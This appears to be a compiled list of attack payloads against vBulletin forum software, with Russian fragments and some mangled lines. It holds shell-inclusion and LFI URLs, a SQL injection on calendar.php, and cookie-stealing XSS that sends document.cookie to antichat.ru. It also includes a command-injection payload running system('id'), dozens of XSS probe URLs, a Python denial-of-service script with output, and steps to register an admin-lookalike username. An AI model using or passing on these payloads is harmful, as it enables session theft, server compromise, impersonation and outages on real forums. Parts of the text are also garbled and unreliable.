Http://WWW.Victim.Com/vb/includes/functions_cron.php?nextitem=[Shell-Att

ack]

Http://WWW.Victim.Com/vb/includes/functions_forumdisplay.php?specialtemp

lates=[Shell-Attack]

www.server.som/forumpath/calendar.php?s=&action=edit&eventid=14 union (SELECT allowsmilies, public, userid, '0000-0-0 ', version (), userid FROM calendar_events WHERE eventid = 14) order by eventdate

3.0.0: search.php
www.xhh777hhh.som/forumpath//search.php?do=process&showposts=0&query = <script> img = new Image (); img.src = «http://antichat.ru/cgi-bin/s. jpg? »+ document.cookie; </ script>
3.0-3.0.4: forumdisplay.php
www.xhh777hhh.som/forumpath/forumdisplay.php?GLOBALS [] = 1 & f = 2 & comma = ». System ( 'id').»
3.0.3-3.0.9: XSS в статусе
<body onLoad=img = new Image(); img.src = «http://antichat.ru/cgi-bin/s.jpg?»+document.cookie;>
3.0.9 и 3.5.4: newthread.php
www.site.com/forumpath/newthread.php?do=newthread&f=3&subject=1234&WYSIWYG_HTML =% 3Cp% 3E% 3C% 2Fp% 3E & s = & f = 3 & do = postthread & posthash = c8d3fe38b082b6d3381cbee17f1f1aca & poststarttime = '% 2Bimg = new Image (); img. src = «http://antichat.ru/cgi-bin/s.jpg?» + document.cookie;% 2B '& sbutton =% D1% EE% E7% E4% E0% F2% FC +% ED% EE% E2 % F3% FE +% F2% E5% EC% F3 & parseurl = 1 & disablesmilies = 1 & emailupdate = 3 & postpoll = yes & polloptions = 1234 & openclose = 1 & stickunstick = 1 & iconid = 0

Exploit: http://[HOST]/forum/calendar.php="<script>alert("! XSS!");</script>

http://127.0.0.1/upload/calendar.php?acuparam=>"><ScRiPt>alert(213771818860)</ScRiPt>
http://127.0.0.1/upload/faq.php?acuparam=>"><ScRiPt>alert(213771818860)</ScRiPt>
http://127.0.0.1/upload/forum.php?acuparam=>"><ScRiPt>alert(213771818860)</ScRiPt>
http://127.0.0.1/upload/usercp.php/>"><ScRiPt>alert(213771818860)</ScRiPt>
http://127.0.0.1/upload/subscription.php?acuparam=>"><ScRiPt>alert(213771818860)</ScRiPt>
http://127.0.0.1/upload/showthread.php?acuparam=>"><ScRiPt>alert(213771818860)</ScRiPt>
http://127.0.0.1/upload/showgroups.php/>"><ScRiPt>alert(213771818860)</ScRiPt>
http://127.0.0.1/upload/sendmessage.php/>"><ScRiPt>alert(213771818860)</ScRiPt>
http://127.0.0.1/upload/search.php/>"><ScRiPt>alert(213771818860)</ScRiPt>
http://127.0.0.1/upload/register.php?acuparam=>"><ScRiPt>alert(213771818860)</ScRiPt>
http://127.0.0.1/upload/profile.php?acuparam=>"><ScRiPt>alert(213771818860)</ScRiPt>
http://127.0.0.1/upload/private.php?acuparam=>"><ScRiPt>alert(213771818860)</ScRiPt>
http://127.0.0.1/upload/online.php/>"><ScRiPt>alert(213771818860)</ScRiPt>
http://127.0.0.1/upload/newthread.php?acuparam=>"><ScRiPt>alert(213771818860)</ScRiPt>
http://127.0.0.1/upload/misc.php/>"><ScRiPt>alert(213771818860)</ScRiPt>
http://127.0.0.1/upload/memberlist.php?=>"'><ScRiPt>alert(213771818860)</ScRiPt>
http://127.0.0.1/upload/member.php/>"><ScRiPt>alert(213771818860)</ScRiPt>
http://127.0.0.1/upload/inlinemod.php?acuparam=>"><ScRiPt>alert(213771818860)</ScRiPt>
http://127.0.0.1/upload/index.php/>"><ScRiPt>alert(213771818860)</ScRiPt>
http://127.0.0.1/upload/forumdisplay.php?acuparam=>"><ScRiPt>alert(213771818860)</ScRiP

[http//www.site.com/[path]/vbseo_sitemap/vbseo_sitemap_functions.php?=[LFI]
http//www.site.com/[path]/includes/functions.php?$classfile=[shell].txt?

www.site.com/path/search.php?search_type=1&contenttype=vBBlog_BlogEntry&query="><script>alert('xss');</script>
www.site.com/path/search.php?search_type=1&contenttype=vBBlog_BlogEntry&query="><script>alert(document.cookie);</script>

import urllib,urllib2,re
print "####################################"
print "#[+]ICW 0-day Domain Crasher #"
print "#[+] Exploit found by Yash [ICW] #"
print "#[+] Exploit Coded by FB1H2S [ICW] #"
print "#[+] Care-Taker d4rk-blu [ICW] #"
print "#[+] Indian Cyber Warriors #"
print "####################################\n"
print "Enter Domain Adress:"
domain=raw_input("[+]Ex: www.site.com<http://www.site.com>:")
url ='http://'+domain+'/misc.php?show=latestposts&vsacb_resnr=10000000'
res = urllib.urlopen(url).read(200)
phpmem= re.findall('of (.*?)bytes.*?',res)
bytes=int(phpmem[0])
mb=bytes/1048576
print '[+]Server php memmory is:'+str(mb)+' MB'
print "[+]Enter the No of request you wann send:"
kill=raw_input("Some 20-30 will be enough:")
try:
for i in range(1,int(kill)):
print i
res1 = urllib.urlopen(url).read(200)
print res1
except(IOError),msg: print "Server will be FCUK'ed by now"
 
 
################################################################
C:\Python25>python vbexploit.py
####################################
#[+]ICW 0-day Domain Crasher #
#[+] Bug found by Yash [ICW] #
#[+] Exploit Coded by FB1H2S [ICW] #
#[+] Care-Taker d4rk-blu [ICW] #
#[+] Indian Cyber Warriors #
####################################
 
Enter Domain Adress:
[+]Ex: www.site.com<http://www.site.com>: sitehere
[+]Server php memmory is:32 MB
[+]Enter the No of request you wann send:20

http://DNSname.com/patch/clientscript/vbulletin-core.js?v=
http://DNSname.com/patch/clientscript/vbulletin-core.js?v=(value)
http://DNSname.com/vb/forumdisplay.php?GLOBALS[]=
http://DNSname.com/patch/forumdisplay.php?GLOBALS[]=1&f=2&comma=".system('id')."
http://DNSname.com/vb/forumdisplay.php?GLOBALS[]=1&f=2&comma=content-type=".allow put chart

1 > Go to Http://[localhost]/path/register.php
2 > Assume that forum admin user name is ADMIN
3 > Type this at User Name ===> ADMIN�
4 > � is an ASCII Code
5 > And complete the other parameters
6 > Then click on Complete Registrarion
7 > Now you see that your user name like admin user name